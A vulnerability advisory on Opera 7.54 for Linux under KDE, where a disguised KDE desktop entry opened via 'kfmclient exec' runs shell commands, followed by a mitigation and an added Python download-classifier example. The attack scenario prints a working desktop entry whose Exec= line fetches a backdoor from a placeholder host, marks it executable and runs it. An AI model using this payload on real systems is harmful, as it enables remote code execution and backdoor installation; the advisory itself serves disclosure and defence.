Opera is "a multi-platform web browser. Opera includes pop-up blocking, tabbed browsing, integrated searches, E-mail, RSS Newsfeeds and IRC chat".
Opera for Linux uses "kfmclient exec" as the "Default Application" for handling saved files. A malicious remote user could use this to execute arbitrary shell commands on a target system.
Credit:
The information has been provided by Giovanni Delvecchio.
The original article can be found at: http://zone-h.org/en/advisories/read/id=6503/
Vulnerable Systems:
* Opera version 7.54 on Linux with KDE 3.2.3
Opening an unknown content type from the web with "kfmclient exec" can be used to open a "KDE Desktop Entry". A desktop entry can carry shell commands in its "Exec=" directive, and therefore runs arbitrary code with the user's privileges.
Possible method of Exploitation:
This method of exploitation requires that a particular file name extension is used. If page.Htm is used as the file name and "kfmclient exec page.Htm" is run, the command in the "Exec=" entry is executed. If "page.htm" is used as the file name instead, it is not treated as a KDE desktop entry but is viewed in Konqueror. The same holds for Jpg, Gif, etc., but not for the lower-case jpg, gif, etc. extensions, since the system is case sensitive.
Attack scenario:
A user clicks on a link which requests http://example.com/malicious/image.Jpg
The server responds with an unknown Content-Type field, for example "Content-Type: image/Jpeg." (note the dot at the end), so Opera shows a dialog window.
If the user chooses "Open" to view image.Jpg, it is opened with the "kfmclient exec" command, since kfmclient is the "Default Application".
image.Jpg is a KDE desktop entry:
# KDE Config File
[KDE Desktop Entry]
SwallowExec=
SwallowTitle=
BinaryPattern=
MimeType=
Exec=/bin/bash -c wget\thttp://malicious_site/backdoor;chmod\t777\tbackdoor;./backdoor
Icon=
TerminalOptions=
Path=
Type=Application
Terminal=0
Note: \t is a horizontal tab. In this case a backdoor is downloaded onto the victim's computer and executed.
Solution:
Disable "kfmclient exec" as the default application.
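The check a download handler needs before dispatching a file, as an added example that is not part of the original advisory: classify a download by its content rather than its name, compare extensions case-insensitively (so image.Jpg and image.jpg are treated alike), and surface any Exec= directive with the tab trick normalised. The extension and magic-byte lists and all sample data are constructed for this example.

```python
import re

# Extensions a download handler would expect to pass to an image viewer (assumption).
IMAGE_EXTENSIONS = {"jpg", "jpeg", "gif", "png"}
# Magic bytes for those formats; JPEG and GIF are the ones the advisory names.
IMAGE_MAGIC = (b"\xff\xd8\xff", b"GIF87a", b"GIF89a", b"\x89PNG")

DESKTOP_GROUP = re.compile(rb"^\s*\[(?:KDE )?Desktop Entry\]\s*$", re.MULTILINE)
EXEC_LINE = re.compile(rb"^\s*Exec\s*=(.*)$", re.MULTILINE)

# Constructed sample downloads (not taken from the advisory); the Exec= is harmless.
SAMPLE_IMAGE = b"\xff\xd8\xff\xe0" + b"\x00" * 16            # JPEG header
SAMPLE_ENTRY = (b"# KDE Config File\n[KDE Desktop Entry]\n"
                b"Type=Application\nExec=/bin/sh -c xmessage\thi\nTerminal=0\n")


def extension_of(name):
    """Lower-cased extension: 'image.Jpg' and 'image.jpg' must compare equal."""
    return name.rsplit(".", 1)[1].lower() if "." in name else ""


def exec_command(data):
    """The Exec= value of a desktop entry with tabs normalised to spaces, or None."""
    if DESKTOP_GROUP.search(data) is None:
        return None
    match = EXEC_LINE.search(data)
    if match is None:
        return None
    return match.group(1).replace(b"\t", b" ").strip().decode(errors="replace")


def classify_download(name, data):
    """Classify by content, not file name: 'image', 'desktop-entry' or 'unknown'."""
    if exec_command(data) is not None:
        return "desktop-entry"
    if extension_of(name) in IMAGE_EXTENSIONS and data.startswith(IMAGE_MAGIC):
        return "image"
    return "unknown"


def safe_to_open(name, data):
    """Auto-open only what the content verifies; a desktop entry never qualifies."""
    return classify_download(name, data) == "image"


if __name__ == "__main__":
    for blob in (SAMPLE_IMAGE, SAMPLE_ENTRY):
        print("image.Jpg", classify_download("image.Jpg", blob), exec_command(blob))
```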